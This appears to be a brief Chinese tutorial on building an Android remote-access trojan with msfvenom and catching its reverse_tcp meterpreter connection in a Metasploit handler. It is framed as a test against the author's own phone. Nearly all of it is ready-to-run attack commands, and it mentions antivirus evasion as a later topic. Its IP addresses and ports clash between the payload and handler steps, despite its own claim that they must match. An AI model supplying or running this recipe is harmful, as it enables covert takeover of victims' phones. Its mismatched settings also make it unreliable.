渗透机:kali2017.3
靶机:自己本人的安卓手机一部
首先我们需要生成一个安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
LHOST 本地的IP地址
LPORT 反向连接到主机的端口
R> 木马生成的保存输出路径
至于木马的免杀暂且不谈。
然后打开msfconsole
图片.png
设置模块
use exploit/multi/handler
设置payload为反向tcp连接
set payload android/meterpreter/reverse_tcp
设置本地的IP地址
set lhost 192.168.11.118
设置端口,跟前面生成木马连接的端口号要对应一样
set lport 4444
show options查看参数
图片.png然后执行
图片.png
下面是我从网上找的一些参数的释义。
psb.png
网友评论